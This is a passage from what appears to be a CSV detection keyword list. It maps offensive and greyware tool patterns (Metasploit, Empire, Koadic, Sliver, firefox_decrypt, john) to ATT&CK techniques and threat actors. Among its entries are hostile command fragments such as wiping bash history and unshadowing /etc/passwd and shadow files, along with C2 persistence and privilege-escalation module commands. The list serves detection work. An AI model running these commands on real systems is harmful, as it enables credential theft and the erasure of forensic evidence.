-T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*unode/firefox_decrypt*,offensive_tool_keyword,firefox_decrypt,Firefox Decrypt is a tool to extract passwords from Mozilla,T1555.003 - T1112 - T1056.001,TA0006 - TA0009 - TA0040,N/A,N/A,Credential Access,https://github.com/unode/firefox_decrypt,1,1,N/A,10,10,1622,283,2023-07-28T15:10:13Z,2014-01-17T13:25:02Z -*UnquotedPath.csproj*,offensive_tool_keyword,UnquotedPath,Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into,T1543.003 - T1036.005 - T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*UnquotedPath.exe*,offensive_tool_keyword,UnquotedPath,Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into,T1543.003 - T1036.005 - T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE*,greyware_tool_keyword,unset,disable history logging,T1056.001 - T1562.001,TA0004 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*unset HISTFILE*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*unset HISTFILE*,greyware_tool_keyword,unset,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*unshackle --*,offensive_tool_keyword,unshackle,Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux,T1110.004 - T1059.004 - T1070.004,TA0006 - TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Fadi002/unshackle,1,0,N/A,10,10,1482,83,2023-09-23T15:54:14Z,2023-07-19T22:30:28Z -*unshackle-main*,offensive_tool_keyword,unshackle,Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux,T1110.004 - T1059.004 - T1070.004,TA0006 - TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Fadi002/unshackle,1,1,N/A,10,10,1482,83,2023-09-23T15:54:14Z,2023-07-19T22:30:28Z -*unshackle-v1.0.iso*,offensive_tool_keyword,unshackle,Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux,T1110.004 - T1059.004 - T1070.004,TA0006 - TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Fadi002/unshackle,1,1,N/A,10,10,1482,83,2023-09-23T15:54:14Z,2023-07-19T22:30:28Z -*unshadow /etc/passwd*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*unshadow passwd shadow > *,greyware_tool_keyword,unshadow,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*unshadow passwd shadow*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*untested_payloads.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*UnwindInspector.exe*,offensive_tool_keyword,SilentMoonwalk,PoC Implementation of a fully dynamic call stack spoofer,T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/SilentMoonwalk,1,1,N/A,9,6,507,84,2022-12-08T10:01:41Z,2022-12-04T13:30:33Z -*Update-ExeFunctions*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*updog --*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,0,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*updog -d /*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,0,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*updog -p *,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,0,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*updog-master.zip*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,1,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*upload-dll * *.dll*,offensive_tool_keyword,dcomhijack,Lateral Movement Using DCOM and DLL Hijacking,T1021 - T1021.003 - T1574 - T1574.007 - T1574.002,TA0008 - TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/WKL-Sec/dcomhijack,1,0,N/A,10,3,228,23,2023-06-18T20:34:03Z,2023-06-17T20:23:24Z -*UploadFileImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*UrbanBishop.exe*,offensive_tool_keyword,Sharp-Suite,C# offensive tools,T1027 - T1059.001 - T1562.001 - T1136.001,TA0004 - TA0005 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*ursnif_IcedID.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*USBPcap*,offensive_tool_keyword,usbpcap,USB capture for Windows.,T1115 - T1129 - T1052,TA0003 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/s-h-3-l-l/katoolin3,1,0,N/A,N/A,4,315,103,2020-08-05T17:21:00Z,2019-09-05T13:14:46Z -*use exploit/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*use implant/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*use incognito*,offensive_tool_keyword,AD exploitation cheat sheet,Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*use powershell_stageless*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*use safetykatz*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*use stager/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*UseBeaconCmd*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*uselistener dbx*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*uselistener onedrive*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*usemodule persistence/*,offensive_tool_keyword,empire,Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*usemodule powershell/persistence*,offensive_tool_keyword,empire,Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*usemodule privesc/*,offensive_tool_keyword,empire,Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*useplugin csharpserver*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*UsePrtAdminAccount*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*UsePrtImperonsationAccount*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*user Inveigh*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*--user orbitaldump*,offensive_tool_keyword,orbitaldump,A simple multi-threaded distributed SSH brute-forcing tool written in Python.,T1110,TA0006,N/A,N/A,Exploitation tools,https://github.com/k4yt3x/orbitaldump,1,0,N/A,N/A,5,440,86,2022-10-30T23:40:57Z,2021-06-06T17:48:19Z -*user_eq_pass_valid_cme_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z 